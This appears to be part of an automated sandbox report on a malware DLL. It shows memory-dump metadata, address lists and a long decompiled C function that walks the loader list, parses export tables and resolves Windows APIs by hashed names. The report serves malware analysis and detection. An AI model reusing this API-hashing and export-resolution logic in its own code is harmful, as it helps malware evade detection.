                                                                                                                                                0x1001997e
                                                                                                                                                0x10019957
                                                                                                                                                0x1001995b
                                                                                                                                                0x10019961
                                                                                                                                                0x10019961
                                                                                                                                                0x10019967
                                                                                                                                                0x00000000
                                                                                                                                                0x10019967
                                                                                                                                                0x10019949
                                                                                                                                                0x1001994d
                                                                                                                                                0x00000000
                                                                                                                                                0x1001994d
                                                                                                                                                0x100198e7
                                                                                                                                                0x10019913
                                                                                                                                                0x1001992b
                                                                                                                                                0x1001992f
                                                                                                                                                0x10019932
                                                                                                                                                0x10019935
                                                                                                                                                0x10019937
                                                                                                                                                0x1001993a
                                                                                                                                                0x10019915
                                                                                                                                                0x10019915
                                                                                                                                                0x10019919
                                                                                                                                                0x1001991c
                                                                                                                                                0x1001991f
                                                                                                                                                0x10019922
                                                                                                                                                0x10019925
                                                                                                                                                0x10019925
                                                                                                                                                0x00000000
                                                                                                                                                0x10019913
                                                                                                                                                0x100198ed
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100198f3
                                                                                                                                                0x100198f7
                                                                                                                                                0x100198fd
                                                                                                                                                0x10019900
                                                                                                                                                0x10019903
                                                                                                                                                0x10019906
                                                                                                                                                0x00000000
                                                                                                                                                0x10019906
                                                                                                                                                0x1001977e
                                                                                                                                                0x10019782
                                                                                                                                                0x10019788
                                                                                                                                                0x00000000
                                                                                                                                                0x10019788
                                                                                                                                                0x100196c0
                                                                                                                                                0x100196d2
                                                                                                                                                0x100196d7
                                                                                                                                                0x10019742
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019749
                                                                                                                                                0x1001976f
                                                                                                                                                0x10019773
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019752
                                                                                                                                                0x10019757
                                                                                                                                                0x1001976b
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001976d
                                                                                                                                                0x1001975e
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019763
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019765
                                                                                                                                                0x00000000
                                                                                                                                                0x10019749
                                                                                                                                                0x100196d9
                                                                                                                                                0x100196e3
                                                                                                                                                0x100196f4
                                                                                                                                                0x100196f7
                                                                                                                                                0x100196fa
                                                                                                                                                0x10019700
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019706
                                                                                                                                                0x10019706
                                                                                                                                                0x10019706
                                                                                                                                                0x1001970d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001970f
                                                                                                                                                0x10019712
                                                                                                                                                0x10019718
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001971a
                                                                                                                                                0x1001971c
                                                                                                                                                0x10019725
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019739
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001973b
                                                                                                                                                0x100196c7
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100196cd
                                                                                                                                                0x10019661
                                                                                                                                                0x10019690
                                                                                                                                                0x10019691
                                                                                                                                                0x1001969a
                                                                                                                                                0x00000000
                                                                                                                                                0x100196ab
                                                                                                                                                0x00000000
                                                                                                                                                0x100196ab
                                                                                                                                                0x10019668
                                                                                                                                                0x1001966b
                                                                                                                                                0x1001967e
                                                                                                                                                0x1001967f
                                                                                                                                                0x10019683
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001966b
                                                                                                                                                0x10019661
                                                                                                                                                0x100195ed
                                                                                                                                                0x1001964a
                                                                                                                                                0x1001964e
                                                                                                                                                0x10019654
                                                                                                                                                0x00000000
                                                                                                                                                0x10019654
                                                                                                                                                0x100195ef
                                                                                                                                                0x100195f3
                                                                                                                                                0x10019600
                                                                                                                                                0x10019604
                                                                                                                                                0x1001961a
                                                                                                                                                0x10019622
                                                                                                                                                0x10019606
                                                                                                                                                0x10019608
                                                                                                                                                0x10019612
                                                                                                                                                0x10019612
                                                                                                                                                0x10019628
                                                                                                                                                0x10019631
                                                                                                                                                0x10019648
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019648
                                                                                                                                                0x10019633
                                                                                                                                                0x10019633
                                                                                                                                                0x00000000
                                                                                                                                                0x10019628

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                • Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
                                                                                                                                                • Instruction ID: 40addf1f47f77ce90969db43eb15dc0c4582e7f707f2120123862ccb300b72ca
                                                                                                                                                • Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
                                                                                                                                                • Instruction Fuzzy Hash: A922893080C7998BE729CF15C49136ABBE0FF86340F14886EE9D65F291D335DA85DB92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                			E10011460(signed char __eax, signed char __edx) {
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				signed char _t231;
                                                                                                                                                				signed char _t233;
                                                                                                                                                				signed char _t238;
                                                                                                                                                				intOrPtr _t241;
                                                                                                                                                				void* _t246;
                                                                                                                                                				signed char _t257;
                                                                                                                                                				signed char _t261;
                                                                                                                                                				signed char _t269;
                                                                                                                                                				signed char _t270;
                                                                                                                                                				signed char _t277;
                                                                                                                                                				signed int _t279;
                                                                                                                                                				signed char _t280;
                                                                                                                                                				signed char _t281;
                                                                                                                                                				void* _t289;
                                                                                                                                                				void* _t290;
                                                                                                                                                				signed char _t315;
                                                                                                                                                				void* _t319;
                                                                                                                                                				signed char _t334;
                                                                                                                                                				signed char _t336;
                                                                                                                                                				void* _t341;
                                                                                                                                                				void* _t347;
                                                                                                                                                				intOrPtr _t352;
                                                                                                                                                				signed char _t354;
                                                                                                                                                				signed char _t363;
                                                                                                                                                				void* _t369;
                                                                                                                                                				intOrPtr _t371;
                                                                                                                                                				signed short* _t373;
                                                                                                                                                				void _t375;
                                                                                                                                                				void* _t379;
                                                                                                                                                				signed int _t381;
                                                                                                                                                				void* _t382;
                                                                                                                                                				void** _t383;
                                                                                                                                                				void* _t384;
                                                                                                                                                				char* _t387;
                                                                                                                                                				signed char _t395;
                                                                                                                                                				signed char* _t396;
                                                                                                                                                				intOrPtr _t400;
                                                                                                                                                				signed int _t451;
                                                                                                                                                				intOrPtr* _t455;
                                                                                                                                                				signed char _t456;
                                                                                                                                                				signed int _t462;
                                                                                                                                                				void* _t467;
                                                                                                                                                				signed char _t471;
                                                                                                                                                				signed char _t472;
                                                                                                                                                				signed char* _t477;
                                                                                                                                                				signed char _t487;
                                                                                                                                                				signed int _t490;
                                                                                                                                                				intOrPtr* _t496;
                                                                                                                                                				intOrPtr _t497;
                                                                                                                                                				signed char _t498;
                                                                                                                                                				signed char _t499;
                                                                                                                                                				intOrPtr _t500;
                                                                                                                                                				signed char _t508;
                                                                                                                                                				intOrPtr _t510;
                                                                                                                                                				void* _t513;
                                                                                                                                                				signed char _t519;
                                                                                                                                                				intOrPtr* _t524;
                                                                                                                                                				signed char _t525;
                                                                                                                                                				signed char _t526;
                                                                                                                                                				signed char _t527;
                                                                                                                                                				signed char _t529;
                                                                                                                                                				signed char* _t531;
                                                                                                                                                				signed char _t532;
                                                                                                                                                				void* _t533;
                                                                                                                                                				void* _t534;
                                                                                                                                                				signed char* _t535;
                                                                                                                                                
                                                                                                                                                				_t535[0x54] = __edx;
                                                                                                                                                				 *_t535 = __eax;
                                                                                                                                                				_t231 = E10010328(__edx, 1);
                                                                                                                                                				if(_t231 != 0) {
                                                                                                                                                					return _t231;
                                                                                                                                                				}
                                                                                                                                                				_t535[0x2c] = _t231;
                                                                                                                                                				if( *0x1001d208 == 0 ||  *0x1001d2e4 != 0) {
                                                                                                                                                					L44:
                                                                                                                                                					if( *_t535 == 0) {
                                                                                                                                                						return 0;
                                                                                                                                                					}
                                                                                                                                                					_t233 =  *_t535;
                                                                                                                                                					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
                                                                                                                                                					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
                                                                                                                                                					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
                                                                                                                                                					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
                                                                                                                                                					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
                                                                                                                                                					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
                                                                                                                                                						L77:
                                                                                                                                                						 *_t535 = 0;
                                                                                                                                                						_t535[0x2c] = 0;
                                                                                                                                                						L78:
                                                                                                                                                						return  *_t535;
                                                                                                                                                					}
                                                                                                                                                					_t535[0x12c] = 0;
                                                                                                                                                					_t535[0x174] = _t535[0x54] ^ 0x7af3da47;
                                                                                                                                                					do {
                                                                                                                                                						_t467 = 0;
                                                                                                                                                						_t387 =  *_t524 +  *_t535;
                                                                                                                                                						_t238 =  *_t387;
                                                                                                                                                						_t535[0x58] = _t238;
                                                                                                                                                						if(_t238 == 0) {
                                                                                                                                                							L49:
                                                                                                                                                							if(E10014FD4( &(_t535[0x58]), _t467) == _t535[0x174]) {
                                                                                                                                                								_t535[0x2c] = 0;
                                                                                                                                                								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
                                                                                                                                                								__eflags = _t241 - _t510;
                                                                                                                                                								if(_t241 < _t510) {
                                                                                                                                                									L57:
                                                                                                                                                									_t471 =  *_t535 + _t241;
                                                                                                                                                									__eflags = _t471;
                                                                                                                                                									 *_t535 = _t471;
                                                                                                                                                									_t535[0x2c] = _t471;
                                                                                                                                                									L58:
                                                                                                                                                									__eflags =  *_t535;
                                                                                                                                                									if( *_t535 == 0) {
                                                                                                                                                										goto L78;
                                                                                                                                                									}
                                                                                                                                                									__eflags =  *0x1001d2ec |  *0x1001d2ed;
                                                                                                                                                									if(( *0x1001d2ec |  *0x1001d2ed) == 0) {
                                                                                                                                                										_t525 =  *0x1001d208; // 0x9cab0a6e
                                                                                                                                                										__eflags = _t525;
                                                                                                                                                										if(_t525 == 0) {
                                                                                                                                                											 *0x1001d2ec = 1;
                                                                                                                                                											_t526 = E100135F4(0x1c4);
                                                                                                                                                											__eflags = _t526;
                                                                                                                                                											if(_t526 == 0) {
                                                                                                                                                												_t526 = 0;
                                                                                                                                                												__eflags = 0;
                                                                                                                                                											} else {
                                                                                                                                                												E10011C54(_t526, 0x10);
                                                                                                                                                												 *(_t526 + 0x1c0) = 0;
                                                                                                                                                											}
                                                                                                                                                											 *0x1001d208 = _t526;
                                                                                                                                                											 *0x1001d2ec = 0;
                                                                                                                                                											L68:
                                                                                                                                                											_t246 = 0;
                                                                                                                                                											_t472 = 0;
                                                                                                                                                											__eflags = 0;
                                                                                                                                                											while(1) {
                                                                                                                                                												__eflags =  *(_t472 + _t526 + 8);
                                                                                                                                                												if( *(_t472 + _t526 + 8) == 0) {
                                                                                                                                                													break;
                                                                                                                                                												}
                                                                                                                                                												_t246 = _t246 + 1;
                                                                                                                                                												_t472 = _t472 + 0x1c;
                                                                                                                                                												__eflags = _t246 - 0x10;
                                                                                                                                                												if(_t246 < 0x10) {
                                                                                                                                                													continue;
                                                                                                                                                												}
                                                                                                                                                												_t375 = E100135F4(0x1c4);
                                                                                                                                                												__eflags = _t375;
                                                                                                                                                												if(_t375 == 0) {
                                                                                                                                                													_t375 = 0;
                                                                                                                                                													__eflags = 0;
                                                                                                                                                												} else {
                                                                                                                                                													E10011C54(_t375, 0x10);
                                                                                                                                                													 *(_t375 + 0x1c0) = 0;
                                                                                                                                                												}
                                                                                                                                                												 *(_t375 + 0x14) = _t535[0x2c];
                                                                                                                                                												E1000DFF8(_t375,  &(_t535[0x58]));
                                                                                                                                                												 *(_t375 + 8) = _t535[0x54];
                                                                                                                                                												 *(_t526 + 0x1c0) = _t375;
                                                                                                                                                												L76:
                                                                                                                                                												 *_t535 = _t535[0x2c];
                                                                                                                                                												goto L78;
                                                                                                                                                											}
                                                                                                                                                											_t527 = _t526 + _t472;
                                                                                                                                                											__eflags = _t527;
                                                                                                                                                											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
                                                                                                                                                											E1000DFF8(_t527,  &(_t535[0x58]));
                                                                                                                                                											 *(_t527 + 8) = _t535[0x54];
                                                                                                                                                											goto L76;
                                                                                                                                                										}
                                                                                                                                                										_t257 =  *(_t525 + 0x1c0);
                                                                                                                                                										while(1) {
                                                                                                                                                											__eflags = _t257;
                                                                                                                                                											if(_t257 == 0) {
                                                                                                                                                												goto L68;
                                                                                                                                                											}
                                                                                                                                                											_t526 = _t257;
                                                                                                                                                											_t257 =  *(_t257 + 0x1c0);
                                                                                                                                                										}
                                                                                                                                                										goto L68;
                                                                                                                                                									}
                                                                                                                                                									__eflags = _t535[0x54] - 0x82fffbdc;
                                                                                                                                                									if(_t535[0x54] == 0x82fffbdc) {
                                                                                                                                                										 *0x1001d20c =  *_t535;
                                                                                                                                                									} else {
                                                                                                                                                										__eflags = _t535[0x54] - 0xdb278333;
                                                                                                                                                										if(_t535[0x54] == 0xdb278333) {
                                                                                                                                                											 *0x1001d210 =  *_t535;
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                									goto L78;
                                                                                                                                                								}
                                                                                                                                                								__eflags = _t241 - _t535[0x130];
                                                                                                                                                								if(_t241 >= _t535[0x130]) {
                                                                                                                                                									goto L57;
                                                                                                                                                								}
                                                                                                                                                								_t535[0x130] =  &(_t535[0x58]);
                                                                                                                                                								_t261 = E1000E8D4( &(_t535[0x58]), 0x7fffffff);
                                                                                                                                                								_t477 =  &(_t535[0x12c]);
                                                                                                                                                								 *_t477 = _t261;
                                                                                                                                                								_t477[2] = _t261 + 1;
                                                                                                                                                								_t395 = E10013044(0xfe338407, 0xccbfc9a9, 0xfe338407, 0xfe338407);
                                                                                                                                                								__eflags = _t395;
                                                                                                                                                								if(_t395 != 0) {
                                                                                                                                                									_t202 =  &(_t535[0x12c]); // 0x100
                                                                                                                                                									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
                                                                                                                                                								}
                                                                                                                                                								 *_t535 = _t535[0x2c];
                                                                                                                                                								goto L58;
                                                                                                                                                							}
                                                                                                                                                							goto L50;
                                                                                                                                                						} else {
                                                                                                                                                							goto L48;
                                                                                                                                                						}
                                                                                                                                                						do {
                                                                                                                                                							L48:
                                                                                                                                                							_t467 = _t467 + 1;
                                                                                                                                                							_t270 =  *((intOrPtr*)(_t467 + _t387));
                                                                                                                                                							_t535[_t467 + 0x58] = _t270;
                                                                                                                                                						} while (_t270 != 0);
                                                                                                                                                						goto L49;
                                                                                                                                                						L50:
                                                                                                                                                						_t524 = _t524 + 4;
                                                                                                                                                						_t396 =  &(_t535[0x12c]);
                                                                                                                                                						_t373 =  &(_t373[1]);
                                                                                                                                                						_t269 =  *_t396 + 1;
                                                                                                                                                						 *_t396 = _t269;
                                                                                                                                                					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
                                                                                                                                                					goto L77;
                                                                                                                                                				} else {
                                                                                                                                                					_t535[0x30] = 0;
                                                                                                                                                					 *0x1001d2e4 = 1;
                                                                                                                                                					E1000F5A8( &(_t535[0x38]), 0);
                                                                                                                                                					E1000F5A8( &(_t535[0x168]), 0x1c);
                                                                                                                                                					_t535[0x58] = E1000F4E0( &(_t535[0x168]), 0);
                                                                                                                                                					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
                                                                                                                                                					_t535[0x48] =  *(_t400 + 0xc);
                                                                                                                                                					_t535[0x60] =  *(_t400 + 0x10);
                                                                                                                                                					goto L5;
                                                                                                                                                					L6:
                                                                                                                                                					_t384 = 0;
                                                                                                                                                					do {
                                                                                                                                                						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
                                                                                                                                                							goto L13;
                                                                                                                                                						}
                                                                                                                                                						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
                                                                                                                                                						_t496 = E10013044(0xfe338407, 0x790529cb, _t279, _t279);
                                                                                                                                                						if(_t496 == 0) {
                                                                                                                                                							L10:
                                                                                                                                                							_t456 = _t535[0x50];
                                                                                                                                                							_t497 =  *((intOrPtr*)(_t529 + 0xc));
                                                                                                                                                							_t498 = _t497 + _t456;
                                                                                                                                                							_t500 =  *((intOrPtr*)(_t529 + 8));
                                                                                                                                                							_t535[0x28] = _t498;
                                                                                                                                                							_t499 = _t498 + _t500;
                                                                                                                                                							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
                                                                                                                                                							_t535[0x24] = _t529;
                                                                                                                                                							_t535[0x20] =  *(_t535[0x48] + 0x30);
                                                                                                                                                							if((_t499 & 0x00000003) == 0) {
                                                                                                                                                								L12:
                                                                                                                                                								_t535[0x1c] = _t363;
                                                                                                                                                								_t535[0x18] = _t499;
                                                                                                                                                								E1000F84C( &(_t535[0xc]), E1000F4F0( &(_t535[8])) + 0x14);
                                                                                                                                                								_t369 = E1000F4E0( &(_t535[0xc]), E1000F4F0( &(_t535[8])) + 0xffffffec);
                                                                                                                                                								_t462 = 5;
                                                                                                                                                								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
                                                                                                                                                								_t535 =  &(_t535[0xc]);
                                                                                                                                                								_t535[4] = _t535[4] + 1;
                                                                                                                                                								goto L13;
                                                                                                                                                							} else {
                                                                                                                                                								goto L11;
                                                                                                                                                							}
                                                                                                                                                							do {
                                                                                                                                                								L11:
                                                                                                                                                								_t499 = _t499 + 1;
                                                                                                                                                								_t363 = _t363 - 1;
                                                                                                                                                							} while ((_t499 & 0x00000003) != 0);
                                                                                                                                                							goto L12;
                                                                                                                                                						}
                                                                                                                                                						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
                                                                                                                                                						if(0 < 0) {
                                                                                                                                                							goto L13;
                                                                                                                                                						}
                                                                                                                                                						goto L10;
                                                                                                                                                						L13:
                                                                                                                                                						_t384 = _t384 + 1;
                                                                                                                                                						_t529 = _t529 + 0x28;
                                                                                                                                                					} while (_t384 < _t535[0x5c]);
                                                                                                                                                					L14:
                                                                                                                                                					_t280 = _t535[4];
                                                                                                                                                					_t535[0x44] = _t280;
                                                                                                                                                					if(_t280 <= 1) {
                                                                                                                                                						L21:
                                                                                                                                                						if(_t535[0x44] <= 0) {
                                                                                                                                                							L24:
                                                                                                                                                							_t281 = _t535[0x48];
                                                                                                                                                							_t556 = _t281 - _t535[0x60];
                                                                                                                                                							if(_t281 != _t535[0x60]) {
                                                                                                                                                								_t535[0x48] =  *_t281;
                                                                                                                                                								E1000F678( &(_t535[8]));
                                                                                                                                                								L5:
                                                                                                                                                								_t277 =  *(_t535[0x48] + 0x18);
                                                                                                                                                								_t535[0x50] = _t277;
                                                                                                                                                								_t535[4] = 0;
                                                                                                                                                								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
                                                                                                                                                								E1000F5A8( &(_t535[0xc]), 0);
                                                                                                                                                								_t279 =  *(_t379 + 6) & 0x0000ffff;
                                                                                                                                                								_t535[0x5c] = _t279;
                                                                                                                                                								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                								if(_t279 <= 0) {
                                                                                                                                                									goto L14;
                                                                                                                                                								}
                                                                                                                                                								goto L6;
                                                                                                                                                							}
                                                                                                                                                							E1000F678( &(_t535[8]));
                                                                                                                                                							E1000F678( &(_t535[0x164]));
                                                                                                                                                							E1000F5A8( &(_t535[0x48]), 0);
                                                                                                                                                							_t535[0x18] = 0;
                                                                                                                                                							E1000F5A8( &(_t535[0x20]), 0);
                                                                                                                                                							_push(0xfe338407);
                                                                                                                                                							_t289 = E10011D58(0xfe338407);
                                                                                                                                                							_t290 = E10011310( &(_t535[0x154]), _t517, _t556);
                                                                                                                                                							_push(_t290);
                                                                                                                                                							_push(_t290);
                                                                                                                                                							E10011C90( &(_t535[0x164]), 0xfe338407);
                                                                                                                                                							_t518 =  &(_t535[0x178]);
                                                                                                                                                							E1000D058( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
                                                                                                                                                							_push(0x80);
                                                                                                                                                							_push(0);
                                                                                                                                                							E10015CAC( &(_t535[0x114]), _t556, _t535[0x184], 1);
                                                                                                                                                							E10015CE0( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
                                                                                                                                                							_push(_t289);
                                                                                                                                                							E10018DE0( &(_t535[0xe4]),  &(_t535[0x180]), 2);
                                                                                                                                                							E1000F678( &(_t535[0x180]));
                                                                                                                                                							_t557 = _t535[0x114];
                                                                                                                                                							if(_t535[0x114] != 0) {
                                                                                                                                                								E1000BB88( &(_t535[0x110]));
                                                                                                                                                							}
                                                                                                                                                							E1000D020( &(_t535[0x104]));
                                                                                                                                                							E1000D020(_t518);
                                                                                                                                                							E1000D020( &(_t535[0x15c]));
                                                                                                                                                							E1000D020( &(_t535[0x154]));
                                                                                                                                                							E100190C4( &(_t535[0xdc]), 0xffffffff);
                                                                                                                                                							_t535[0x118] = _t535[0xf0];
                                                                                                                                                							E1000F63C( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
                                                                                                                                                							_push(1);
                                                                                                                                                							E10019088( &(_t535[0x11c]));
                                                                                                                                                							_t381 = 0;
                                                                                                                                                							_t535[0x64] = 0;
                                                                                                                                                							_t535[0x60] = 0;
                                                                                                                                                							do {
                                                                                                                                                								_t535[0x58] = E1000F4E0( &(_t535[0x38]), _t535[0x60]);
                                                                                                                                                								_t535[0x70] = E1000F4F0( &(_t535[0x44]));
                                                                                                                                                								_t519 =  *(0x1001bd40 + _t381 * 4);
                                                                                                                                                								_t531 = E10019054( &(_t535[0xf4]), _t519, _t519);
                                                                                                                                                								if(_t531 == 0) {
                                                                                                                                                									goto L42;
                                                                                                                                                								}
                                                                                                                                                								_t508 = E100187C0( &(_t535[0x11c]), _t519,  *_t531);
                                                                                                                                                								_t532 =  *_t531;
                                                                                                                                                								while(_t532 ==  *_t508) {
                                                                                                                                                									_t508 = _t508 + 8;
                                                                                                                                                									__eflags = _t508;
                                                                                                                                                								}
                                                                                                                                                								_t315 =  *_t508;
                                                                                                                                                								_t535[0x74] = _t315;
                                                                                                                                                								_t535[0x78] = _t315 - _t532;
                                                                                                                                                								if(_t381 != 0) {
                                                                                                                                                									L38:
                                                                                                                                                									_t535[0x68] = E1000F4F0( &(_t535[0x44]));
                                                                                                                                                									_t535[0x6c] = _t519;
                                                                                                                                                									E1000F500( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
                                                                                                                                                									_t319 = E1000F4F0( &(_t535[0x44]));
                                                                                                                                                									_t487 = _t535[0x58];
                                                                                                                                                									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
                                                                                                                                                									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
                                                                                                                                                										E1000F84C( &(_t535[0x20]), E1000F4F0( &(_t535[0x1c])) + 8);
                                                                                                                                                										E1000F4E0( &(_t535[0x20]), E1000F4F0( &(_t535[0x1c])) + 0xfffffff8);
                                                                                                                                                										asm("movsd");
                                                                                                                                                										asm("movsd");
                                                                                                                                                										_t535[0x18] = _t535[0x18] + 1;
                                                                                                                                                										__eflags = _t381 - 0x1d;
                                                                                                                                                										if(__eflags == 0) {
                                                                                                                                                											_t228 =  &(_t535[0x44]); // 0x2c
                                                                                                                                                											E10013154(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
                                                                                                                                                										}
                                                                                                                                                										goto L42;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C( &(_t535[0x48]), _t535[0x70]);
                                                                                                                                                									E10013154(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
                                                                                                                                                									E1000F864( &(_t535[0x44]), _t563);
                                                                                                                                                									E1000F864( &(_t535[0x1c]), _t563);
                                                                                                                                                									_t381 = _t381 - 1;
                                                                                                                                                									_t334 = _t535[0x64] + 1;
                                                                                                                                                									_t535[0x60] = _t535[0x60] + 0x14;
                                                                                                                                                									_t535[0x18] = 0;
                                                                                                                                                									_t535[0x64] = _t334;
                                                                                                                                                									if(_t334 == _t535[0x30]) {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									goto L42;
                                                                                                                                                								}
                                                                                                                                                								E10019114( &(_t535[0x134]), _t519);
                                                                                                                                                								_t535[0x5c] = _t532;
                                                                                                                                                								while(1) {
                                                                                                                                                									_t336 = _t535[0x5c];
                                                                                                                                                									_t562 =  *_t336 - 0xb8;
                                                                                                                                                									if( *_t336 == 0xb8) {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									_t490 = _t535[0x5c] + E100190DC( &(_t535[0x138]), __eflags, _t535[0x74]);
                                                                                                                                                									_t535[0x5c] = _t490;
                                                                                                                                                									__eflags = _t490 -  *_t508;
                                                                                                                                                									if(__eflags < 0) {
                                                                                                                                                										continue;
                                                                                                                                                									}
                                                                                                                                                									L37:
                                                                                                                                                									E1000F678( &(_t535[0x144]));
                                                                                                                                                									E1000F678( &(_t535[0x134]));
                                                                                                                                                									goto L38;
                                                                                                                                                								}
                                                                                                                                                								 *0x1001d2e8 =  *((intOrPtr*)(_t336 + 1));
                                                                                                                                                								goto L37;
                                                                                                                                                								L42:
                                                                                                                                                								_t381 = _t381 + 1;
                                                                                                                                                							} while (_t381 < 0x1e);
                                                                                                                                                							E1000F678( &(_t535[0x11c]));
                                                                                                                                                							E10018E40(_t381,  &(_t535[0xd8]));
                                                                                                                                                							E1000F678( &(_t535[0x1c]));
                                                                                                                                                							E1000F678( &(_t535[0x44]));
                                                                                                                                                							E1000F678( &(_t535[0x34]));
                                                                                                                                                							goto L44;
                                                                                                                                                						}
                                                                                                                                                						_t533 = 0;
                                                                                                                                                						_t382 = 0;
                                                                                                                                                						do {
                                                                                                                                                							_t341 = E1000F4E0( &(_t535[0xc]), _t382);
                                                                                                                                                							_t517 = _t341;
                                                                                                                                                							E1000F84C( &(_t535[0x38]), E1000F4F0( &(_t535[0x34])) + 0x14);
                                                                                                                                                							_t347 = E1000F4E0( &(_t535[0x38]), E1000F4F0( &(_t535[0x34])) + 0xffffffec);
                                                                                                                                                							_t451 = 5;
                                                                                                                                                							memcpy(_t347, _t341, _t451 << 2);
                                                                                                                                                							_t535 =  &(_t535[0xc]);
                                                                                                                                                							_t533 = _t533 + 1;
                                                                                                                                                							_t382 = _t382 + 0x14;
                                                                                                                                                							_t535[0x30] = _t535[0x30] + 1;
                                                                                                                                                						} while (_t533 < _t535[0x44]);
                                                                                                                                                						goto L24;
                                                                                                                                                					}
                                                                                                                                                					_t535[0x4c] = 1;
                                                                                                                                                					_t534 = 0x14;
                                                                                                                                                					do {
                                                                                                                                                						_t62 = _t534 - 0x14; // 0x0
                                                                                                                                                						_t383 = E1000F4E0( &(_t535[0xc]), _t62);
                                                                                                                                                						_t455 = E1000F4E0( &(_t535[0xc]), _t534);
                                                                                                                                                						_t517 =  *_t383;
                                                                                                                                                						_t352 =  *_t455;
                                                                                                                                                						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
                                                                                                                                                							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
                                                                                                                                                						}
                                                                                                                                                						_t534 = _t534 + 0x14;
                                                                                                                                                						_t354 = _t535[0x4c] + 1;
                                                                                                                                                						_t535[0x4c] = _t354;
                                                                                                                                                					} while (_t354 < _t535[0x44]);
                                                                                                                                                					_t535[0x44] = _t535[4];
                                                                                                                                                					goto L21;
                                                                                                                                                				}
                                                                                                                                                			}








































































                                                                                                                                                0x1001146c
                                                                                                                                                0x10011473
                                                                                                                                                0x10011476
                                                                                                                                                0x1001147d
                                                                                                                                                0x10011bff
                                                                                                                                                0x10011bff
                                                                                                                                                0x10011483
                                                                                                                                                0x1001148e
                                                                                                                                                0x100119cd
                                                                                                                                                0x100119d1
                                                                                                                                                0x00000000
                                                                                                                                                0x10011c50
                                                                                                                                                0x100119d7
                                                                                                                                                0x100119da
                                                                                                                                                0x100119dd
